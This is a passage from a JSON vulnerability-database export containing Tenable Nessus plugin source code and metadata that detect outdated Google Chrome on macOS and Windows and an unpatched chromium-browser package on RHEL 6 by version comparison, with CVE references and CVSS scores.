"https://www.tenable.com/plugins/nessus/133953", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133953);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Google Chrome < 80.0.3987.122 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 80.0.3987.122. It is, therefore, affected by\nmultiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aae39d39\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1045931\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1053604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1044570\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 80.0.3987.122 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6407\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'80.0.3987.122', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:06:51", "description": "The version of Google Chrome installed on the remote Windows host is prior to 80.0.3987.122. It is, therefore, affected by multiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-24T00:00:00", "type": "nessus", "title": "Google Chrome < 80.0.3987.122 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "modified": "2022-12-06T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_80_0_3987_122.NASL", "href": "https://www.tenable.com/plugins/nessus/133954", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133954);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-6407\", \"CVE-2020-6418\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"Google Chrome < 80.0.3987.122 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 80.0.3987.122. It is, therefore, affected\nby multiple vulnerabilities as referenced in the 2020_02_stable-channel-update-for-desktop_24 advisory. Note that Nessus\nhas not tested for this issue but has instead relied only on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?aae39d39\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1045931\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1053604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1044570\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 80.0.3987.122 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6407\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\ninstalls = get_kb_list('SMB/Google_Chrome/*');\n\ngoogle_chrome_check_version(installs:installs, fix:'80.0.3987.122', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-26T14:35:02", "description": "The remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as referenced in the RHSA-2020:0738 advisory.\n\n - ICU: Integer overflow in UnicodeString::doAppend() (CVE-2020-10531)\n\n - chromium-browser: Type confusion in V8 (CVE-2020-6383, CVE-2020-6418)\n\n - chromium-browser: Use after free in WebAudio (CVE-2020-6384)\n\n - chromium-browser: Use after free in speech (CVE-2020-6386)\n\n - chromium-browser: Out of bounds memory access in streams (CVE-2020-6407)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2020:0738)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10531", "CVE-2020-6383", "CVE-2020-6384", "CVE-2020-6386", "CVE-2020-6407", "CVE-2020-6418"], "modified": "2023-01-23T00:00:00", "cpe": ["cpe:2.3:o:redhat:enterprise_linux:6:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:rhel_eus:6.0:*:*:*:*:*:*:*", "p-cpe:2.3:a:redhat:enterprise_linux:chromium-browser:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:rhel_els:6:*:*:*:*:*:*:*"], "id": "REDHAT-RHSA-2020-0738.NASL", "href": "https://www.tenable.com/plugins/nessus/134360", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:0738. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134360);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/23\");\n\n script_cve_id(\n \"CVE-2020-6383\",\n \"CVE-2020-6384\",\n \"CVE-2020-6386\",\n \"CVE-2020-6407\",\n \"CVE-2020-6418\",\n \"CVE-2020-10531\"\n );\n script_xref(name:\"RHSA\", value:\"2020:0738\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"IAVA\", value:\"2020-A-0078-S\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0023\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2020:0738)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 6 host has a package installed that is affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:0738 advisory.\n\n - ICU: Integer overflow in UnicodeString::doAppend() (CVE-2020-10531)\n\n - chromium-browser: Type confusion in V8 (CVE-2020-6383, CVE-2020-6418)\n\n - chromium-browser: Use after free in WebAudio (CVE-2020-6384)\n\n - chromium-browser: Use after free in speech (CVE-2020-6386)\n\n - chromium-browser: Out of bounds memory access in streams (CVE-2020-6407)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6383\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6384\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6386\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6407\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-6418\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-10531\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:0738\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807343\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807349\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807381\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807498\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807499\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1807500\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium-browser package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-6407\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 80 JSCreate side-effect type confusion exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(190, 843);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_els:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '6')) audit(AUDIT_OS_NOT, 'Red Hat 6.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel/client/6/6Client/i386/debug',\n 'content/dist/rhel/client/6/6Client/i386/optional/debug',\n 'content/dist/rhel/client/6/6Client/i386/optional/os',\n 'content/dist/rhel/client/6/6Client/i386/optional/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/i386/oracle-java-rm/os',\n 'content/dist/rhel/client/6/6Client/i386/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/i386/os',\n 'content/dist/rhel/client/6/6Client/i386/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/i386/supplementary/debug',\n 'content/dist/rhel/client/6/6Client/i386/supplementary/os',\n 'content/dist/rhel/client/6/6Client/i386/supplementary/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/debug',\n 'content/dist/rhel/client/6/6Client/x86_64/optional/debug',\n 'content/dist/rhel/client/6/6Client/x86_64/optional/os',\n 'content/dist/rhel/client/6/6Client/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/client/6/6Client/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/os',\n 'content/dist/rhel/client/6/6Client/x86_64/source/SRPMS',\n 'content/dist/rhel/client/6/6Client/x86_64/supplementary/debug',\n 'content/dist/rhel/client/6/6Client/x86_64/supplementary/os',\n 'content/dist/rhel/client/6/6Client/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/hpn/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/hpn/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/hpn/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/optional/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/optional/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/scalablefilesystem/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/scalablefilesystem/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/scalablefilesystem/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/source/SRPMS',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/supplementary/debug',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/supplementary/os',\n 'content/dist/rhel/computenode/6/6ComputeNode/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/debug',\n 'content/dist/rhel/server/6/6Server/i386/highavailability/debug',\n 'content/dist/rhel/server/6/6Server/i386/highavailability/os',\n 'content/dist/rhel/server/6/6Server/i386/highavailability/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/loadbalancer/debug',\n 'content/dist/rhel/server/6/6Server/i386/loadbalancer/os',\n 'content/dist/rhel/server/6/6Server/i386/loadbalancer/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/optional/debug',\n 'content/dist/rhel/server/6/6Server/i386/optional/os',\n 'content/dist/rhel/server/6/6Server/i386/optional/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/oracle-java-rm/os',\n 'content/dist/rhel/server/6/6Server/i386/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/os',\n 'content/dist/rhel/server/6/6Server/i386/resilientstorage/debug',\n 'content/dist/rhel/server/6/6Server/i386/resilientstorage/os',\n 'content/dist/rhel/server/6/6Server/i386/resilientstorage/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/i386/supplementary/debug',\n 'content/dist/rhel/server/6/6Server/i386/supplementary/os',\n 'content/dist/rhel/server/6/6Server/i386/supplementary/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/highavailability/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/highavailability/os',\n 'content/dist/rhel/server/6/6Server/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/hpn/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/hpn/os',\n 'content/dist/rhel/server/6/6Server/x86_64/hpn/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/loadbalancer/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/loadbalancer/os',\n 'content/dist/rhel/server/6/6Server/x86_64/loadbalancer/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/optional/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/optional/os',\n 'content/dist/rhel/server/6/6Server/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/server/6/6Server/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/os',\n 'content/dist/rhel/server/6/6Server/x86_64/resilientstorage/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/resilientstorage/os',\n 'content/dist/rhel/server/6/6Server/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/sap-hana/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/sap-hana/os',\n 'content/dist/rhel/server/6/6Server/x86_64/sap-hana/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/sap/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/sap/os',\n 'content/dist/rhel/server/6/6Server/x86_64/sap/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/scalablefilesystem/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/scalablefilesystem/os',\n 'content/dist/rhel/server/6/6Server/x86_64/scalablefilesystem/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/source/SRPMS',\n 'content/dist/rhel/server/6/6Server/x86_64/supplementary/debug',\n 'content/dist/rhel/server/6/6Server/x86_64/supplementary/os',\n 'content/dist/rhel/server/6/6Server/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/debug',\n 'content/dist/rhel/workstation/6/6Workstation/i386/optional/debug',\n 'content/dist/rhel/workstation/6/6Workstation/i386/optional/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/optional/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/oracle-java-rm/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/i386/supplementary/debug',\n 'content/dist/rhel/workstation/6/6Workstation/i386/supplementary/os',\n 'content/dist/rhel/workstation/6/6Workstation/i386/supplementary/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/optional/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/optional/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/oracle-java-rm/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/scalablefilesystem/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/scalablefilesystem/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/scalablefilesystem/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/source/SRPMS',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/supplementary/debug',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/supplementary/os',\n 'content/dist/rhel/workstation/6/6Workstation/x86_64/supplementary/source/SRPMS',\n 'content/els/rhel/server/6/6Server/i386/debug',\n 'content/els/rhel/server/6/6Server/i386/optional/debug',\n 'content/els/rhel/server/6/6Server/i386/optional/os',\n 'content/els/rhel/server/6/6Server/i386/optional/source/SRPMS',\n 'content/els/rhel/server/6/6Server/i386/os',\n 'content/els/rhel/server/6/6Server/i386/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/debug',\n 'content/els/rhel/server/6/6Server/x86_64/optional/debug',\n 'content/els/rhel/server/6/6Server/x86_64/optional/os',\n 'content/els/rhel/server/6/6Server/x86_64/optional/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/os',\n 'content/els/rhel/server/6/6Server/x86_64/sap-hana/debug',\n 'content/els/rhel/server/6/6Server/x86_64/sap-hana/os',\n 'content/els/rhel/server/6/6Server/x86_64/sap-hana/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/sap/debug',\n 'content/els/rhel/server/6/6Server/x86_64/sap/os',\n 'content/els/rhel/server/6/6Server/x86_64/sap/source/SRPMS',\n 'content/els/rhel/server/6/6Server/x86_64/source/SRPMS',\n 'content/fastrack/rhel/client/6/i386/debug',\n 'content/fastrack/rhel/client/6/i386/optional/debug',\n 'content/fastrack/rhel/client/6/i386/optional/os',\n 'content/fastrack/rhel/client/6/i386/optional/source/SRPMS',\n 'content/fastrack/rhel/client/6/i386/os',\n 'content/fastrack/rhel/client/6/i386/source/SRPMS',\n 'content/fastrack/rhel/client/6/x86_64/debug',\n 'content/fastrack/rhel/client/6/x86_64/optional/debug',\n 'content/fastrack/rhel/client/6/x86_64/optional/os',\n 'content/fastrack/rhel/client/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/client/6/x86_64/os',\n 'content/fastrack/rhel/client/6/x86_64/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/hpn/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/hpn/os',\n 'content/fastrack/rhel/computenode/6/x86_64/hpn/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/optional/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/optional/os',\n 'content/fastrack/rhel/computenode/6/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/os',\n 'content/fastrack/rhel/computenode/6/x86_64/scalablefilesystem/debug',\n 'content/fastrack/rhel/computenode/6/x86_64/scalablefilesystem/os',\n 'content/fastrack/rhel/computenode/6/x86_64/scalablefilesystem/source/SRPMS',\n 'content/fastrack/rhel/computenode/6/x86_64/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/debug',\n 'content/fastrack/rhel/server/6/i386/highavailability/debug',\n 'content/fastrack/rhel/server/6/i386/highavailability/os',\n 'content/fastrack/rhel/server/6/i386/highavailability/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/loadbalancer/debug',\n 'content/fastrack/rhel/server/6/i386/loadbalancer/os',\n 'content/fastrack/rhel/server/6/i386/loadbalancer/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/optional/debug',\n 'content/fastrack/rhel/server/6/i386/optional/os',\n 'content/fastrack/rhel/server/6/i386/optional/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/os',\n 'content/fastrack/rhel/server/6/i386/resilientstorage/debug',\n 'content/fastrack/rhel/server/6/i386/resilientstorage/os',\n 'content/fastrack/rhel/server/6/i386/resilientstorage/source/SRPMS',\n 'content/fastrack/rhel/server/6/i386/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/debug',\n 'content/fastrack/rhel/server/6/x86_64/highavailability/debug',\n 'content/fastrack/rhel/server/6/x86_64/highavailability/os',\n 'content/fastrack/rhel/server/6/x86_64/highavailability/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/hpn/debug',\n 'content/fastrack/rhel/server/6/x86_64/hpn/os',\n 'content/fastrack/rhel/server/6/x86_64/hpn/source/SRPMS',\n 'content/fastrack/rhel/server/6/x86_64/loadbalancer/debug',\n 'content/fastrack/rhel/server/6/x86_64/loadbalancer/os',\n 